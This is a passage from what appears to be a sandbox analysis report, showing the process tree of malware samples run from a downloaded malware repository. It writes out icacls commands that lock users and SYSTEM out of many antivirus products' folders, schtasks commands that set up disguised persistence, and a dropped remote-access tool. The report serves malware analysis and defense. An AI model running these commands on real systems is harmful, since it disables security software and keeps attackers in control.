                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                PID:4028
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                  icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                  PID:5576
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                  PID:5480
                                                                                                                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                      PID:2296
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                      icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                                                                                      PID:3640
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                      PID:3512
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                          PID:460
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                          icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                                                                                          PID:4720
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                          PID:3232
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                            icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                                                                            PID:4044
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                            PID:2772
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                              icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                                                                                              PID:6080
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                              PID:2008
                                                                                                                                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                  PID:4936
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                  icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                                                                                  PID:1280
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                  PID:4152
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                    icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                                                                                                    PID:3724
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                    PID:200
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                      icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                                                                                                      PID:4952
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                      PID:3452
                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                          PID:4556
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                          icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                          PID:4792
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                          PID:4976
                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                              PID:2524
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                              icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                                                                                                              PID:4092
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                            PID:5628
                                                                                                                                                                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                PID:3844
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                                                                                                                PID:1740
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                PID:5680
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                  icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                                                                                                  PID:5900
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                  PID:5644
                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                      PID:5696
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                      icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                                                                                                                      PID:4688
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                      PID:2340
                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                          PID:5344
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                          icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                                                                                                                          PID:6096
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                        PID:1428
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                          icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                                                                                                                          PID:1968
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                        PID:5720
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                          icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                                                                                                                          PID:432
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                          PID:2100
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                            icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                                                                                                            PID:2376
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                            PID:6008
                                                                                                                                                                                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                PID:5440
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                PID:1744
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                PID:4028
                                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                    PID:5648
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                    icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                    PID:2752
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                    PID:2776
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                      icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                      PID:940
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                      PID:4776
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                        icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                        PID:5972
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                      PID:1280
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                          PID:2928
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                          icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                          PID:4748
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                                                                        PID:4376
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                                                                        PID:2452
                                                                                                                                                                                                                                                                                                                                    • C:\ProgramData\Windows\rutserv.exe
                                                                                                                                                                                                                                                                                                                                      C:\ProgramData\Windows\rutserv.exe
                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                      PID:3068
                                                                                                                                                                                                                                                                                                                                      • C:\ProgramData\Windows\rfusclient.exe
                                                                                                                                                                                                                                                                                                                                        C:\ProgramData\Windows\rfusclient.exe
                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                                        PID:1144
                                                                                                                                                                                                                                                                                                                                        • C:\ProgramData\Windows\rfusclient.exe
                                                                                                                                                                                                                                                                                                                                          C:\ProgramData\Windows\rfusclient.exe /tray
                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                          • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                                                                                                                                                          PID:2908
                                                                                                                                                                                                                                                                                                                                      • C:\ProgramData\Windows\rfusclient.exe
                                                                                                                                                                                                                                                                                                                                        C:\ProgramData\Windows\rfusclient.exe /tray
                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                        PID:1168
                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Stealer\Lokibot.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Stealer\Lokibot.exe"
                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                      PID:3580
                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Stealer\Lokibot.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Stealer\Lokibot.exe"
                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                          PID:3720
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                          PID:1888
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                            PID:5936
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                            C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                            PID:5868
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                            C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                            PID:1088
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                              PID:4344
                                                                                                                                                                                                                                                                                                                                            • C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                              C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                              PID:4676
                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\IconDance.exe
                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\IconDance.exe"
                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                PID:2184
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Illerka.C.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Illerka.C.exe"
                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                • UAC bypass
                                                                                                                                                                                                                                                                                                                                                • NTFS ADS
                                                                                                                                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                PID:4916
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Mist\G37X85C3M28X6KV6E76.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Mist\G37X85C3M28X6KV6E76.exe"
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                  • System policy modification
                                                                                                                                                                                                                                                                                                                                                  PID:2040
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\MrsMajors\J84Y36F4C82H3HQ3R12.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\MrsMajors\J84Y36F4C82H3HQ3R12.exe"
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                  • UAC bypass
                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                  PID:2736
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\MrsMajors\BossDaMajor\M60S43G4J57K8NC8M50.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\MrsMajors\BossDaMajor\M60S43G4J57K8NC8M50.exe"
                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                    • UAC bypass
                                                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                    • System policy modification
                                                                                                                                                                                                                                                                                                                                                    PID:2864
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Spark\E38E17Y0Y42A6CD7Z36.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Spark\E38E17Y0Y42A6CD7Z36.exe"
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                  • System policy modification
                                                                                                                                                                                                                                                                                                                                                  PID:5220
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\XCSSETMacMalware\T17E38Z5U78S0OA1T50.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\XCSSETMacMalware\T17E38Z5U78S0OA1T50.exe"
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                  PID:5400
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\VeryFun.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\VeryFun.exe"
